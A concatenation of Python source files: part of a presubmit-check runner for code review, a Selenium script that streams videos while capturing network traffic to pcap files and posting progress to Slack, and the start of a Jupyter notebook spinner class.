def __init__(self, *args, **kwargs):
AffectedFile.__init__(self, *args, **kwargs)
self._server_path = None
self._is_testable_file = None
def IsTestableFile(self):
if self._is_testable_file is None:
if self.Action() == 'D':
# A deleted file is not testable.
self._is_testable_file = False
else:
self._is_testable_file = os.path.isfile(self.AbsoluteLocalPath())
return self._is_testable_file
class Change(object):
"""Describe a change.
Used directly by the presubmit scripts to query the current change being
tested.
Instance members:
tags: Dictionary of KEY=VALUE pairs found in the change description.
self.KEY: equivalent to tags['KEY']
"""
_AFFECTED_FILES = AffectedFile
# Matches key/value (or 'tag') lines in changelist descriptions.
TAG_LINE_RE = re.compile(
'^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$')
scm = ''
def __init__(
self, name, description, local_root, files, issue, patchset, author,
upstream=None):
if files is None:
files = []
self._name = name
# Convert root into an absolute path.
self._local_root = os.path.abspath(local_root)
self._upstream = upstream
self.issue = issue
self.patchset = patchset
self.author_email = author
self._full_description = ''
self.tags = {}
self._description_without_tags = ''
self.SetDescriptionText(description)
assert all(
(isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files
diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream)
self._affected_files = [
self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache)
for action, path in files
]
def UpstreamBranch(self):
"""Returns the upstream branch for the change."""
return self._upstream
def Name(self):
"""Returns the change name."""
return self._name
def DescriptionText(self):
"""Returns the user-entered changelist description, minus tags.
Any line in the user-provided description starting with e.g. 'FOO='
(whitespace permitted before and around) is considered a tag line. Such
lines are stripped out of the description this function returns.
"""
return self._description_without_tags
def FullDescriptionText(self):
"""Returns the complete changelist description including tags."""
return self._full_description
def SetDescriptionText(self, description):
"""Sets the full description text (including tags) to |description|.
Also updates the list of tags."""
self._full_description = description
# From the description text, build up a dictionary of key/value pairs
# plus the description minus all key/value or 'tag' lines.
description_without_tags = []
self.tags = {}
for line in self._full_description.splitlines():
m = self.TAG_LINE_RE.match(line)
if m:
self.tags[m.group('key')] = m.group('value')
else:
description_without_tags.append(line)
# Change back to text and remove whitespace at end.
self._description_without_tags = (
'\n'.join(description_without_tags).rstrip())
def AddDescriptionFooter(self, key, value):
"""Adds the given footer to the change description.
Args:
key: A string with the key for the git footer. It must conform to
the git footers format (i.e. 'List-Of-Tokens') and will be case
normalized so that each token is title-cased.
value: A string with the value for the git footer.
"""
description = git_footers.add_footer(
self.FullDescriptionText(), git_footers.normalize_name(key), value)
self.SetDescriptionText(description)
def RepositoryRoot(self):
"""Returns the repository (checkout) root directory for this change,
as an absolute path.
"""
return self._local_root
def __getattr__(self, attr):
"""Return tags directly as attributes on the object."""
if not re.match(r'^[A-Z_]*$', attr):
raise AttributeError(self, attr)
return self.tags.get(attr)
def GitFootersFromDescription(self):
"""Return the git footers present in the description.
Returns:
footers: A dict of {footer: [values]} containing a multimap of the footers
in the change description.
"""
return git_footers.parse_footers(self.FullDescriptionText())
def BugsFromDescription(self):
"""Returns all bugs referenced in the commit description."""
tags = [b.strip() for b in self.tags.get('BUG', '').split(',') if b.strip()]
footers = []
parsed = self.GitFootersFromDescription()
unsplit_footers = parsed.get('Bug', []) + parsed.get('Fixed', [])
for unsplit_footer in unsplit_footers:
footers += [b.strip() for b in unsplit_footer.split(',')]
return sorted(set(tags + footers))
def ReviewersFromDescription(self):
"""Returns all reviewers listed in the commit description."""
# We don't support a 'R:' git-footer for reviewers; that is in metadata.
tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()]
return sorted(set(tags))
def TBRsFromDescription(self):
"""Returns all TBR reviewers listed in the commit description."""
tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()]
# TODO(crbug.com/839208): Remove support for 'Tbr:' when TBRs are
# programmatically determined by self-CR+1s.
footers = self.GitFootersFromDescription().get('Tbr', [])
return sorted(set(tags + footers))
# TODO(crbug.com/753425): Delete these once we're sure they're unused.
@property
def BUG(self):
return ','.join(self.BugsFromDescription())
@property
def R(self):
return ','.join(self.ReviewersFromDescription())
@property
def TBR(self):
return ','.join(self.TBRsFromDescription())
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
raise NotImplementedError()
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Returns a list of AffectedFile instances for all files in the change.
Args:
include_deletes: If false, deleted files will be filtered out.
file_filter: An additional filter to apply.
Returns:
[AffectedFile(path, action), AffectedFile(path, action)]
"""
affected = list(filter(file_filter, self._affected_files))
if include_deletes:
return affected
return list(filter(lambda x: x.Action() != 'D', affected))
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Return a list of the existing text files in a change."""
if include_deletes is not None:
warn('AffectedTeestableFiles(include_deletes=%s)'
' is deprecated and ignored' % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return list(filter(
lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs)))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def LocalPaths(self):
"""Convenience function."""
return [af.LocalPath() for af in self.AffectedFiles()]
def AbsoluteLocalPaths(self):
"""Convenience function."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def RightHandSideLines(self):
"""An iterator over all text lines in 'new' version of changed files.
Lists lines from new or modified text files in the change.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
"""
return _RightHandSideLinesImpl(
x for x in self.AffectedFiles(include_deletes=False)
if x.IsTestableFile())
def OriginalOwnersFiles(self):
"""A map from path names of affected OWNERS files to their old content."""
def owners_file_filter(f):
return 'OWNERS' in os.path.split(f.LocalPath())[1]
files = self.AffectedFiles(file_filter=owners_file_filter)
return dict([(f.LocalPath(), f.OldContents()) for f in files])
class GitChange(Change):
_AFFECTED_FILES = GitAffectedFile
scm = 'git'
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
root = root or self.RepositoryRoot()
return subprocess.check_output(
['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.'],
cwd=root).decode('utf-8', 'ignore').splitlines()
def ListRelevantPresubmitFiles(files, root):
"""Finds all presubmit files that apply to a given set of source files.
If inherit-review-settings-ok is present right under root, looks for
PRESUBMIT.py in directories enclosing root.
Args:
files: An iterable container containing file paths.
root: Path where to stop searching.
Return:
List of absolute paths of the existing PRESUBMIT.py scripts.
"""
files = [normpath(os.path.join(root, f)) for f in files]
# List all the individual directories containing files.
directories = set([os.path.dirname(f) for f in files])
# Ignore root if inherit-review-settings-ok is present.
if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')):
root = None
# Collect all unique directories that may contain PRESUBMIT.py.
candidates = set()
for directory in directories:
while True:
if directory in candidates:
break
candidates.add(directory)
if directory == root:
break
parent_dir = os.path.dirname(directory)
if parent_dir == directory:
# We hit the system root directory.
break
directory = parent_dir
# Look for PRESUBMIT.py in all candidate directories.
results = []
for directory in sorted(list(candidates)):
try:
for f in os.listdir(directory):
p = os.path.join(directory, f)
if os.path.isfile(p) and re.match(
r'PRESUBMIT.*\.py$', f) and not f.startswith('PRESUBMIT_test'):
results.append(p)
except OSError:
pass
logging.debug('Presubmit files: %s', ','.join(results))
return results
class GetTryMastersExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, project, change):
"""Executes GetPreferredTryMasters() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
project: Project name to pass to presubmit script for bot selection.
Return:
A map of try masters to map of builders to set of tests.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'GetPreferredTryMasters'
if function_name not in context:
return {}
get_preferred_try_masters = context[function_name]
if not len(inspect.getargspec(get_preferred_try_masters)[0]) == 2:
raise PresubmitFailure(
'Expected function "GetPreferredTryMasters" to take two arguments.')
return get_preferred_try_masters(project, change)
class GetPostUploadExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, gerrit_obj, change):
"""Executes PostUploadHook() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
gerrit_obj: The GerritAccessor object.
change: The Change object.
Return:
A list of results objects.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'PostUploadHook'
if function_name not in context:
return {}
post_upload_hook = context[function_name]
if not len(inspect.getargspec(post_upload_hook)[0]) == 3:
raise PresubmitFailure(
'Expected function "PostUploadHook" to take three arguments.')
return post_upload_hook(gerrit_obj, change, OutputApi(False))
def _MergeMasters(masters1, masters2):
"""Merges two master maps. Merges also the tests of each builder."""
result = {}
for (master, builders) in itertools.chain(masters1.items(),
masters2.items()):
new_builders = result.setdefault(master, {})
for (builder, tests) in builders.items():
new_builders.setdefault(builder, set([])).update(tests)
return result
def DoGetTryMasters(change,
changed_files,
repository_root,
default_presubmit,
project,
verbose,
output_stream):
"""Get the list of try masters from the presubmit scripts.
Args:
changed_files: List of modified files.
repository_root: The repository root.
default_presubmit: A default presubmit script to execute in any case.
project: Optional name of a project used in selecting trybots.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
Return:
Map of try masters to map of builders to set of tests.
"""
presubmit_files = ListRelevantPresubmitFiles(changed_files, repository_root)
if not presubmit_files and verbose:
output_stream.write('Warning, no PRESUBMIT.py found.\n')
results = {}
executer = GetTryMastersExecuter()
if default_presubmit:
if verbose:
output_stream.write('Running default presubmit script.\n')
fake_path = os.path.join(repository_root, 'PRESUBMIT.py')
results = _MergeMasters(results, executer.ExecPresubmitScript(
default_presubmit, fake_path, project, change))
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results = _MergeMasters(results, executer.ExecPresubmitScript(
presubmit_script, filename, project, change))
# Make sets to lists again for later JSON serialization.
for builders in results.values():
for builder in builders:
builders[builder] = list(builders[builder])
if results and verbose:
output_stream.write('%s\n' % str(results))
return results
def DoPostUploadExecuter(change,
gerrit_obj,
verbose):
"""Execute the post upload hook.
Args:
change: The Change object.
gerrit_obj: The GerritAccessor object.
verbose: Prints debug info.
"""
presubmit_files = ListRelevantPresubmitFiles(
change.LocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
sys.stdout.write('Warning, no PRESUBMIT.py found.\n')
results = []
executer = GetPostUploadExecuter()
# The root presubmit file should be executed after the ones in subdirectories.
# i.e. the specific post upload hooks should run before the general ones.
# Thus, reverse the order provided by ListRelevantPresubmitFiles.
presubmit_files.reverse()
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
sys.stdout.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results.extend(executer.ExecPresubmitScript(
presubmit_script, filename, gerrit_obj, change))
if not results:
return 0
sys.stdout.write('\n')
sys.stdout.write('** Post Upload Hook Messages **\n')
exit_code = 0
for result in results:
if result.fatal:
exit_code = 1
result.handle()
sys.stdout.write('\n')
return exit_code
class PresubmitExecuter(object):
def __init__(self, change, committing, verbose, gerrit_obj, dry_run=None,
thread_pool=None, parallel=False, use_python3=False):
"""
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
use_python3: if true, will use python3 instead of python2 by default
if USE_PYTHON3 is not specified.
"""
self.change = change
self.committing = committing
self.gerrit = gerrit_obj
self.verbose = verbose
self.dry_run = dry_run
self.more_cc = []
self.thread_pool = thread_pool
self.parallel = parallel
self.use_python3 = use_python3
def ExecPresubmitScript(self, script_text, presubmit_path):
"""Executes a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: The path to the presubmit file (this will be reported via
input_api.PresubmitLocalPath()).
Return:
A list of result objects, empty if no problems.
"""
# Change to the presubmit file's directory to support local imports.
main_path = os.getcwd()
presubmit_dir = os.path.dirname(presubmit_path)
os.chdir(presubmit_dir)
# Load the presubmit script into context.
input_api = InputApi(self.change, presubmit_path, self.committing,
self.verbose, gerrit_obj=self.gerrit,
dry_run=self.dry_run, thread_pool=self.thread_pool,
parallel=self.parallel)
output_api = OutputApi(self.committing)
context = {}
# Try to figure out whether these presubmit checks should be run under
# python2 or python3. We need to do this without actually trying to
# compile the text, since the text might compile in one but not the
# other.
m = re.search('^USE_PYTHON3 = (True|False)$', script_text,
flags=re.MULTILINE)
if m:
use_python3 = m.group(1) == 'True'
else:
use_python3 = self.use_python3
if (((sys.version_info.major == 2) and use_python3) or
((sys.version_info.major == 3) and not use_python3)):
return []
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e))
context['__args'] = (input_api, output_api)
# Get path of presubmit directory relative to repository root.
# Always use forward slashes, so that path is same in *nix and Windows
root = input_api.change.RepositoryRoot()
rel_path = os.path.relpath(presubmit_dir, root)
rel_path = rel_path.replace(os.path.sep, '/')
# Get the URL of git remote origin and use it to identify host and project
host = project = ''
if self.gerrit:
host = self.gerrit.host or ''
project = self.gerrit.project or ''
# Prefix for test names
prefix = 'presubmit:%s/%s:%s/' % (host, project, rel_path)
# Perform all the desired presubmit checks.
results = []
try:
version = [
int(x) for x in context.get('PRESUBMIT_VERSION', '0.0.0').split('.')
]
with rdb_wrapper.client(prefix) as sink:
if version >= [2, 0, 0]:
for function_name in context:
if not function_name.startswith('Check'):
continue
if function_name.endswith('Commit') and not self.committing:
continue
if function_name.endswith('Upload') and self.committing:
continue
logging.debug('Running %s in %s', function_name, presubmit_path)
results.extend(
self._run_check_function(function_name, context, sink))
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
else: # Old format
if self.committing:
function_name = 'CheckChangeOnCommit'
else:
function_name = 'CheckChangeOnUpload'
if function_name in context:
logging.debug('Running %s in %s', function_name, presubmit_path)
results.extend(
self._run_check_function(function_name, context, sink))
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
finally:
for f in input_api._named_temporary_files:
os.remove(f)
# Return the process to the original working directory.
os.chdir(main_path)
return results
def _run_check_function(self, function_name, context, sink=None):
"""Evaluates and returns the result of a given presubmit function.
If sink is given, the result of the presubmit function will be reported
to the ResultSink.
Args:
function_name: the name of the presubmit function to evaluate
context: a context dictionary in which the function will be evaluated
sink: an instance of ResultSink. None, by default.
Returns:
the result of the presubmit function call.
"""
start_time = time_time()
try:
result = eval(function_name + '(*__args)', context)
self._check_result_type(result)
except Exception:
if sink:
elapsed_time = time_time() - start_time
sink.report(function_name, rdb_wrapper.STATUS_FAIL, elapsed_time)
# TODO(crbug.com/953884): replace reraise with native py3:
# raise .. from e
e_type, e_value, e_tb = sys.exc_info()
print('Evaluation of %s failed: %s' % (function_name, e_value))
six.reraise(e_type, e_value, e_tb)
elapsed_time = time_time() - start_time
if elapsed_time > 10.0:
sys.stdout.write(
'%s took %.1fs to run.\n' % (function_name, elapsed_time))
if sink:
status = rdb_wrapper.STATUS_PASS
if any(r.fatal for r in result):
status = rdb_wrapper.STATUS_FAIL
sink.report(function_name, status, elapsed_time)
return result
def _check_result_type(self, result):
"""Helper function which ensures result is a list, and all elements are
instances of OutputApi.PresubmitResult"""
if not isinstance(result, (tuple, list)):
raise PresubmitFailure('Presubmit functions must return a tuple or list')
if not all(isinstance(res, OutputApi.PresubmitResult) for res in result):
raise PresubmitFailure(
'All presubmit results must be of types derived from '
'output_api.PresubmitResult')
def DoPresubmitChecks(change,
committing,
verbose,
default_presubmit,
may_prompt,
gerrit_obj,
dry_run=None,
parallel=False,
json_output=None,
use_python3=False):
"""Runs all presubmit checks that apply to the files in the change.
This finds all PRESUBMIT.py files in directories enclosing the files in the
change (up to the repository root) and calls the relevant entrypoint function
depending on whether the change is being committed or uploaded.
Prints errors, warnings and notifications. Prompts the user for warnings
when needed.
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
verbose: Prints debug info.
default_presubmit: A default presubmit script to execute in any case.
may_prompt: Enable (y/n) questions on warning or error. If False,
any questions are answered with yes by default.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests specified by input_api.RunTests in all
PRESUBMIT files will be run in parallel.
use_python3: if true, default to using Python3 for presubmit checks
rather than Python2.
Return:
1 if presubmit checks failed or 0 otherwise.
"""
old_environ = os.environ
try:
# Make sure python subprocesses won't generate .pyc files.
os.environ = os.environ.copy()
os.environ['PYTHONDONTWRITEBYTECODE'] = '1'
python_version = 'Python %s' % sys.version_info.major
if committing:
sys.stdout.write('Running %s presubmit commit checks ...\n' %
python_version)
else:
sys.stdout.write('Running %s presubmit upload checks ...\n' %
python_version)
start_time = time_time()
presubmit_files = ListRelevantPresubmitFiles(
change.AbsoluteLocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
sys.stdout.write('Warning, no PRESUBMIT.py found.\n')
results = []
thread_pool = ThreadPool()
executer = PresubmitExecuter(change, committing, verbose, gerrit_obj,
dry_run, thread_pool, parallel, use_python3)
if default_presubmit:
if verbose:
sys.stdout.write('Running default presubmit script.\n')
fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py')
results += executer.ExecPresubmitScript(default_presubmit, fake_path)
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
sys.stdout.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results += executer.ExecPresubmitScript(presubmit_script, filename)
results += thread_pool.RunAsync()
messages = {}
should_prompt = False
presubmits_failed = False
for result in results:
if result.fatal:
presubmits_failed = True
messages.setdefault('ERRORS', []).append(result)
elif result.should_prompt:
should_prompt = True
messages.setdefault('Warnings', []).append(result)
else:
messages.setdefault('Messages', []).append(result)
sys.stdout.write('\n')
for name, items in messages.items():
sys.stdout.write('** Presubmit %s **\n' % name)
for item in items:
item.handle()
sys.stdout.write('\n')
total_time = time_time() - start_time
if total_time > 1.0:
sys.stdout.write(
'Presubmit checks took %.1fs to calculate.\n\n' % total_time)
if not should_prompt and not presubmits_failed:
sys.stdout.write('%s presubmit checks passed.\n' % python_version)
elif should_prompt:
sys.stdout.write('There were %s presubmit warnings. ' % python_version)
if may_prompt:
presubmits_failed = not prompt_should_continue(
'Are you sure you wish to continue? (y/N): ')
else:
sys.stdout.write('\n')
if json_output:
# Write the presubmit results to json output
presubmit_results = {
'errors': [
error.json_format()
for error in messages.get('ERRORS', [])
],
'notifications': [
notification.json_format()
for notification in messages.get('Messages', [])
],
'warnings': [
warning.json_format()
for warning in messages.get('Warnings', [])
],
'more_cc': executer.more_cc,
}
gclient_utils.FileWrite(
json_output, json.dumps(presubmit_results, sort_keys=True))
global _ASKED_FOR_FEEDBACK
# Ask for feedback one time out of 5.
if (len(results) and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK):
sys.stdout.write(
'Was the presubmit check useful? If not, run "git cl presubmit -v"\n'
'to figure out which PRESUBMIT.py was run, then run git blame\n'
'on the file to figure out who to ask for help.\n')
_ASKED_FOR_FEEDBACK = True
return 1 if presubmits_failed else 0
finally:
os.environ = old_environ
def _scan_sub_dirs(mask, recursive):
if not recursive:
return [x for x in glob.glob(mask) if x not in ('.svn', '.git')]
results = []
for root, dirs, files in os.walk('.'):
if '.svn' in dirs:
dirs.remove('.svn')
if '.git' in dirs:
dirs.remove('.git')
for name in files:
if fnmatch.fnmatch(name, mask):
results.append(os.path.join(root, name))
return results
def _parse_files(args, recursive):
logging.debug('Searching for %s', args)
files = []
for arg in args:
files.extend([('M', f) for f in _scan_sub_dirs(arg, recursive)])
return files
def _parse_change(parser, options):
"""Process change options.
Args:
parser: The parser used to parse the arguments from command line.
options: The arguments parsed from command line.
Returns:
A GitChange if the change root is a git repository, or a Change otherwise.
"""
if options.files and options.all_files:
parser.error('<files> cannot be specified when --all-files is set.')
change_scm = scm.determine_scm(options.root)
if change_scm != 'git' and not options.files:
parser.error('<files> is not optional for unversioned directories.')
if options.files:
change_files = _parse_files(options.files, options.recursive)
elif options.all_files:
change_files = [('M', f) for f in scm.GIT.GetAllFiles(options.root)]
else:
change_files = scm.GIT.CaptureStatus(
options.root, options.upstream or None)
logging.info('Found %d file(s).', len(change_files))
change_class = GitChange if change_scm == 'git' else Change
return change_class(
options.name,
options.description,
options.root,
change_files,
options.issue,
options.patchset,
options.author,
upstream=options.upstream)
def _parse_gerrit_options(parser, options):
"""Process gerrit options.
SIDE EFFECTS: Modifies options.author and options.description from Gerrit if
options.gerrit_fetch is set.
Args:
parser: The parser used to parse the arguments from command line.
options: The arguments parsed from command line.
Returns:
A GerritAccessor object if options.gerrit_url is set, or None otherwise.
"""
gerrit_obj = None
if options.gerrit_url:
gerrit_obj = GerritAccessor(
url=options.gerrit_url,
project=options.gerrit_project,
branch=options.gerrit_branch)
if not options.gerrit_fetch:
return gerrit_obj
if not options.gerrit_url or not options.issue or not options.patchset:
parser.error(
'--gerrit_fetch requires --gerrit_url, --issue and --patchset.')
options.author = gerrit_obj.GetChangeOwner(options.issue)
options.description = gerrit_obj.GetChangeDescription(
options.issue, options.patchset)
logging.info('Got author: "%s"', options.author)
logging.info('Got description: """\n%s\n"""', options.description)
return gerrit_obj
@contextlib.contextmanager
def canned_check_filter(method_names):
filtered = {}
try:
for method_name in method_names:
if not hasattr(presubmit_canned_checks, method_name):
logging.warning('Skipping unknown "canned" check %s' % method_name)
continue
filtered[method_name] = getattr(presubmit_canned_checks, method_name)
setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: [])
yield
finally:
for name, method in filtered.items():
setattr(presubmit_canned_checks, name, method)
def main(argv=None):
parser = argparse.ArgumentParser(usage='%(prog)s [options] <files...>')
hooks = parser.add_mutually_exclusive_group()
hooks.add_argument('-c', '--commit', action='store_true',
help='Use commit instead of upload checks.')
hooks.add_argument('-u', '--upload', action='store_false', dest='commit',
help='Use upload instead of commit checks.')
hooks.add_argument('--post_upload', action='store_true',
help='Run post-upload commit hooks.')
parser.add_argument('-r', '--recursive', action='store_true',
help='Act recursively.')
parser.add_argument('-v', '--verbose', action='count', default=0,
help='Use 2 times for more debug info.')
parser.add_argument('--name', default='no name')
parser.add_argument('--author')
desc = parser.add_mutually_exclusive_group()
desc.add_argument('--description', default='', help='The change description.')
desc.add_argument('--description_file',
help='File to read change description from.')
parser.add_argument('--issue', type=int, default=0)
parser.add_argument('--patchset', type=int, default=0)
parser.add_argument('--root', default=os.getcwd(),
help='Search for PRESUBMIT.py up to this directory. '
'If inherit-review-settings-ok is present in this '
'directory, parent directories up to the root file '
'system directories will also be searched.')
parser.add_argument('--upstream',
help='Git only: the base ref or upstream branch against '
'which the diff should be computed.')
parser.add_argument('--default_presubmit')
parser.add_argument('--may_prompt', action='store_true', default=False)
parser.add_argument('--skip_canned', action='append', default=[],
help='A list of checks to skip which appear in '
'presubmit_canned_checks. Can be provided multiple times '
'to skip multiple canned checks.')
parser.add_argument('--dry_run', action='store_true', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_url', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_project', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_branch', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_fetch', action='store_true',
help=argparse.SUPPRESS)
parser.add_argument('--parallel', action='store_true',
help='Run all tests specified by input_api.RunTests in '
'all PRESUBMIT files in parallel.')
parser.add_argument('--json_output',
help='Write presubmit errors to json output.')
parser.add_argument('--all_files', action='store_true',
help='Mark all files under source control as modified.')
parser.add_argument('files', nargs='*',
help='List of files to be marked as modified when '
'executing presubmit or post-upload hooks. fnmatch '
'wildcards can also be used.')
parser.add_argument('--use-python3', action='store_true',
help='Use python3 for presubmit checks by default')
options = parser.parse_args(argv)
log_level = logging.ERROR
if options.verbose >= 2:
log_level = logging.DEBUG
elif options.verbose:
log_level = logging.INFO
log_format = ('[%(levelname).1s%(asctime)s %(process)d %(thread)d '
'%(filename)s] %(message)s')
logging.basicConfig(format=log_format, level=log_level)
if options.description_file:
options.description = gclient_utils.FileRead(options.description_file)
gerrit_obj = _parse_gerrit_options(parser, options)
change = _parse_change(parser, options)
try:
if options.post_upload:
return DoPostUploadExecuter(
change,
gerrit_obj,
options.verbose)
with canned_check_filter(options.skip_canned):
return DoPresubmitChecks(
change,
options.commit,
options.verbose,
options.default_presubmit,
options.may_prompt,
gerrit_obj,
options.dry_run,
options.parallel,
options.json_output,
options.use_python3)
except PresubmitFailure as e:
print(e, file=sys.stderr)
print('Maybe your depot_tools is out of date?', file=sys.stderr)
return 2
if __name__ == '__main__':
fix_encoding.fix_encoding()
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(2)
|
streaming_generator.py
|
import sys
sys.path.insert(0, "/home/mclrn/dlproject/")
import datetime
from threading import Thread
from selenium import webdriver
from slackclient import SlackClient
import traceback
import os
from selenium.webdriver.support.ui import WebDriverWait
# import trafficgen.Streaming.win_capture as cap
# import trafficgen.Streaming.streaming_types as stream
import unix_capture as cap
import streaming_types as stream
from constants import SLACK_TOKEN
def notifySlack(message):
sc = SlackClient(SLACK_TOKEN)
try:
sc.api_call("chat.postMessage", channel="#server", text=message)
except:
sc.api_call("chat.postMessage", channel="#server", text="Could not send stacktrace")
def generate_streaming(duration, dir, total_iterations, options=None):
iterations = 0
stream_types = {
# 'hbo': (stream.HboNordic, 1),
# 'netflix': (stream.Netflix, 1),
'twitch': (stream.Twitch, 5),
'youtube': (stream.Youtube, 5),
'drtv': (stream.DrTv, 5),
}
while iterations < total_iterations:
print("Iteration:", iterations)
if iterations % 25 == 0:
notifySlack("Starting iteration: " + str(iterations))
try:
for stream_type in stream_types.keys():
browsers, capture_thread, file, streaming_threads, = [], [], [], []
type = stream_types[stream_type][0]
num_threads = stream_types[stream_type][1]
browsers, capture_thread, file, streaming_threads = generate_threaded_streaming(type, stream_type, dir,
duration, options,
num_threads=num_threads)
try:
capture_thread.start()
for thread in streaming_threads:
# Start streaming threads
thread.start()
print("streaming started", stream_type)
capture_thread.join() # Stream until the capture thread joins
print("capture done - thread has joined")
except Exception as e:
notifySlack("Something went wrong %s" % traceback.format_exc())
# Wait for capture thread
capture_thread.join()
# Do a cleanup since somthing went wrong
cap.cleanup(file)
try:
for browser in browsers:
browser.close()
browser.quit()
except Exception as e:
notifySlack("Something went wrong %s" % traceback.format_exc())
# os.system("killall chrome")
# os.system("killall chromedriver")
except Exception as ex:
notifySlack("Something went wrong when setting up the threads \n %s" % traceback.format_exc())
iterations += 1
def generate_threaded_streaming(obj: stream.Streaming, stream_name, dir, duration, chrome_options=None, num_threads=5):
#### STREAMING ####
# Create filename
now = datetime.datetime.now()
file = dir + "/%s-%.2d%.2d_%.2d%.2d%.2d.pcap" % (stream_name, now.day, now.month, now.hour, now.minute, now.second)
# Instantiate thread
capture_thread = Thread(target=cap.captureTraffic, args=(1, duration, dir, file))
# Create five threads for streaming
streaming_threads = []
browsers = []
for i in range(num_threads):
browser = webdriver.Chrome(options=chrome_options)
browser.implicitly_wait(10)
browsers.append(browser)
t = Thread(target=obj.stream_video, args=(obj, browser))
streaming_threads.append(t)
return browsers, capture_thread, file, streaming_threads
def get_clear_browsing_button(driver):
"""Find the "CLEAR BROWSING BUTTON" on the Chrome settings page. /deep/ to go past shadow roots"""
return driver.find_element_by_css_selector('* /deep/ #clearBrowsingDataConfirm')
def clear_cache(driver, timeout=60):
"""Clear the cookies and cache for the ChromeDriver instance."""
# navigate to the settings page
driver.get('chrome://settings/clearBrowserData')
# wait for the button to appear
wait = WebDriverWait(driver, timeout)
wait.until(get_clear_browsing_button)
# click the button to clear the cache
get_clear_browsing_button(driver).click()
# wait for the button to be gone before returning
wait.until_not(get_clear_browsing_button)
if __name__ == "__main__":
#netflixuser = os.environ["netflixuser"]
#netflixpassword = os.environ["netflixpassword"]
#hbouser = os.environ["hbouser"]
#hbopassword = os.environ["hbopassword"]
# slack_token = os.environ['slack_token']
# Specify duration in seconds
duration = 60 * 1
total_iterations = 1000
save_dir = '/home/mclrn/Data'
chrome_profile_dir = "/home/mclrn/.config/google-chrome/"
options = webdriver.ChromeOptions()
#options.add_argument('user-data-dir=' + chrome_profile_dir)
options.add_argument("--enable-quic")
# options.add_argument('headless')
generate_streaming(duration, save_dir, total_iterations, options)
print("something")
|
halo_notebook.py
|
from __future__ import absolute_import, print_function, unicode_literals
import sys
import threading
import cursor
from halo import Halo
from halo._utils import decode_utf_8_text
class HaloNotebook(Halo):
def __init__(self, text='', color='cyan', spinner=None, placement='left',
animation=None, interval=-1, enabled=True, stream=sys.stdout):
super(HaloNotebook, self).__init__(text=text, color=color, spinner=spinner,
placement=placement,
animation=animation,
interval=interval, enabled=enabled,
stream=stream)
self.output = self._make_output_widget()
def _make_output_widget(self):
from ipywidgets.widgets import Output
return Output()
# TODO: using property and setter
def _output(self, text=''):
return ({'name': 'stdout', 'output_type': 'stream', 'text': text},)
def clear(self):
if not self._enabled:
return self
with self.output:
self.output.outputs += self._output('\r')
self.output.outputs += self._output(self.CLEAR_LINE)
self.output.outputs = self._output()
return self
def _render_frame(self):
frame = self.frame()
